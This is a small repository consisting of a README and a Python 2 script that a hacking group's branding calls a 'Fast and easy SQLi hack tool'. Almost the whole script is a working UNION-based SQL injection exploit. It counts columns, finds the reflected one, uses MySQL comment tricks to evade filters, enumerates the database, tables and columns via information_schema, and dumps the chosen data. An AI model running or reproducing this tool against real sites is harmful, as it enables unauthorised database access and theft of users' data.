├── README.md └── sqli.py /README.md: -------------------------------------------------------------------------------- 1 | # Sqli 2 | - [OK] - Get Database 3 | - [OK] - Enumerate Tables 4 | - [OK] - Enumerate Columns 5 | - [OK] - Dump Columns 6 | 7 | 8 | -------------------------------------------------------------------------------- /sqli.py: -------------------------------------------------------------------------------- 1 | # Facebook: https://www.facebook.com/TheCybersTeam 2 | # Group: https://www.facebook.com/groups/TheCybersTeam 3 | # Channel: https://www.youtube.com/channel/UCKFMv1cifW55lKKps2thhbw 4 | 5 | import urllib as cybers 6 | import sys 7 | import os 8 | import platform 9 | 10 | clear = "clear" 11 | if platform.system() == "Windows": 12 | clear = "cls" 13 | os.system(str(clear)) 14 | 15 | header=""" 16 | _____ _ ___ _ _____ 17 | /__ \ |__ ___ / __\ _| |__ ___ _ __ ___ /__ \___ __ _ _ __ ___ 18 | / /\/ '_ \ / _ \ / / | | | | '_ \ / _ \ '__/ __| / /\/ _ \/ _` | '_ ` _ \ 19 | / / | | | | __/ / /__| |_| | |_) | __/ | \__ \ / / | __/ (_| | | | | | | 20 | \/ |_| |_|\___| \____/\__, |_.__/ \___|_| |___/ \/ \___|\__,_|_| |_| |_| 21 | |___/ 22 | More: https://www.facebook.com/TheCybersTeam 23 | Fast and easy SQLi hack tool Beta 2.3" 24 | """ 25 | print header 26 | 27 | class Sqli: 28 | url = None 29 | vulCol = None 30 | columns = None 31 | dbs = [] 32 | payload = "0x2d31+/*!50000union*/+/*!50000select*/" 33 | build = ["", ""] 34 | key = "1620597971540027" 35 | def setUrl(self): 36 | for k, v in enumerate(sys.argv): 37 | if v == "--url": 38 | try: 39 | u = sys.argv[k+1] 40 | pos = u.find("=") 41 | url = u[:pos+1] 42 | self.url = url 43 | except: 44 | pass 45 | try: 46 | print "Url: "+u 47 | print "\n" 48 | except NameError: 49 | pass 50 | print "*ERROR*: Url not defined!\n" 51 | print "Usage: python sqli.py --url http://testphp.vulnweb.com/listproducts.php?cat=1\n" 52 | exit() 53 | 54 | def getContent(self,url): 55 | res = cybers.urlopen(url) 56 | return res.read() 57 | 58 | def setColumns(self): 59 | print "Start Count Columns..." 60 | url = self.url + self.payload 61 | start = 1 62 | finish = 50 63 | for i in range(start,finish): 64 | sys.stdout.write("\rColumns Total: {0}".format(i)) 65 | if i != start and i != finish: 66 | url+=", " 67 | url+=self.key 68 | res = self.getContent(url) 69 | if res.find("union select") ==-1: 70 | if res.find("1620597971540027") !=-1: 71 | self.columns = i 72 | return 73 | self.columns = 0 74 | 75 | def setVulCol(self): 76 | for i in range(1, self.columns+1): 77 | line = self.payload 78 | for j in range(1, self.columns+1): 79 | if j != 1 and j != self.columns+1: 80 | line = line + ", " 81 | if i == j: 82 | line+="/*!50000ConCat(0x27,"+self.key+",0x27)*/" 83 | else: 84 | line+="/*!50000ConCat(0x27,"+str(j)+",0x27)*/" 85 | res = self.getContent(self.url + line) 86 | if res.find(self.key) !=-1: 87 | self.vulCol = i 88 | return 89 | self.vulCol = 0 90 | exit() 91 | 92 | def getConcat(self,string): 93 | return "/*!50000Concat(0x5e27,/*!50000gROup_cONcat("+string+")*/,0x275e)" 94 | 95 | def getVars(self,content): 96 | pos = content.find("^'") 97 | if(pos != -1): 98 | ini = content[pos+2:] 99 | pos = ini.find("'^") 100 | if(pos !=-1): 101 | return ini[:pos] 102 | else: 103 | print "*ERROR*: Not found!\n" 104 | exit() 105 | 106 | def getDatabase(self): 107 | self.build = [self.url + self.payload, ""] 108 | line = "" 109 | side = 0 110 | for i in range(1, self.columns+1): 111 | if i != 1 and i != self.columns+1: 112 | line="," 113 | if side == 0: 114 | if i != self.vulCol: 115 | self.build[side]+=line+str(i) 116 | line+= str(i) 117 | else: 118 | if i !=1: 119 | self.build[side]+="," 120 | side = 1 121 | else: 122 | self.build[side]+=line+str(i) 123 | url = self.build[0]+"/*!50000Group_Concat(0x5e27,database(),0x275e)*/"+self.build[1] 124 | res = self.getContent(url) 125 | return self.getVars(res) 126 | 127 | def getTables(self,database): 128 | url = self.build[0]+self.getConcat("table_name")+self.build[1]+"++from+/*!50000inforMAtion_schema*/.tables+ /*!50000wHEre*/+/*!50000taBLe_scheMA*/like+database()--+" 129 | res = self.getContent(url) 130 | return self.getVars(res) 131 | 132 | def charCode(self,string): 133 | char = "" 134 | last = len(string)-1 135 | i = 0 136 | for j in string: 137 | char+=str(ord(j)) 138 | if last != i: 139 | char+=", " 140 | i+=1 141 | return char 142 | 143 | def getColumns(self,table,database): 144 | url = self.build[0]+self.getConcat("column_name")+self.build[1]+"++from+/*!50000inforMAtion_schema*/.columns+ /*!50000wHEre*/+/*!50000taBLe_name*/=CHAR("+self.charCode(table)+")--+" 145 | res = self.getContent(url) 146 | return self.getVars(res) 147 | 148 | def getData(self,cols,table,database): 149 | line = "" 150 | i = 0 151 | title = "" 152 | space = [] 153 | for name in cols: 154 | space.append(len(name)) 155 | title+=name+"\t" 156 | if i !=0: 157 | line+=",0x3a," 158 | line+=name 159 | i+=1 160 | url = self.build[0]+"/*!50000ConCAt(0x5e27,/*!50000gROup_cONcat("+line+")*/,0x275e)"+self.build[1]+"+from+"+table+"--+-" 161 | res = self.getContent(url) 162 | data = self.getVars(res) 163 | try: 164 | rows = data.split(",") 165 | except: 166 | print "*ERROR*: Not found!\n" 167 | vector = [] 168 | for j in rows: 169 | i=0 170 | col = j.split(":") 171 | temp = [] 172 | for k in col: 173 | temp.append(k) 174 | if len(k)>space[i]: 175 | space[i]=len(k) 176 | i=i+1 177 | vector.append(temp) 178 | self.dbs[0].tables[0].setDatas(vector) 179 | line="" 180 | i=0 181 | for j in cols: 182 | line+=j 183 | for k in range(len(j),space[i]+2): 184 | line+=" " 185 | print line 186 | for j in rows: 187 | i = 0 188 | col = j.split(":") 189 | line="" 190 | i=0 191 | for k in col: 192 | line+=k 193 | for l in range(len(k),space[i]+2): 194 | line +=" " 195 | i=i+1 196 | print line 197 | 198 | class Db: 199 | name = None 200 | tables = [] 201 | def setName(self, name): 202 | self.name = name 203 | def setTables(self, table): 204 | self.tables = table 205 | 206 | class Tb: 207 | name = None 208 | columns = [] 209 | rows = [] 210 | def setName(self,name): 211 | self.name = name 212 | def setColumns(self,columns): 213 | self.columns = columns 214 | def setDatas(self,rows): 215 | self.rows = rows 216 | 217 | s = Sqli() 218 | s.setUrl() 219 | 220 | s.setColumns() 221 | s.setVulCol() 222 | print "\nVul Column: " +str(s.vulCol) 223 | 224 | db = Db() 225 | database = s.getDatabase() 226 | db.setName(database) 227 | s.dbs.append(db) 228 | 229 | for i in s.dbs: 230 | print "Database: " + i.name 231 | 232 | tbs = [] 233 | tables = s.getTables(s.dbs[0].name) 234 | for i in tables.split(","): 235 | tb = Tb() 236 | tb.setName(i) 237 | tbs.append(tb) 238 | 239 | s.dbs[0].setTables(tbs) 240 | print "Tables: "+tables 241 | 242 | sys.stdout.write("\nTable: ") 243 | table = raw_input() 244 | cols = s.getColumns(table,s.dbs[0].name) 245 | cls = cols.split(",") 246 | s.dbs[0].tables[0].setColumns(cls) 247 | print "Columns: "+cols 248 | 249 | sys.stdout.write("\nColumns names: ") 250 | cols = raw_input().split(",") 251 | s.getData(cols,table,database) --------------------------------------------------------------------------------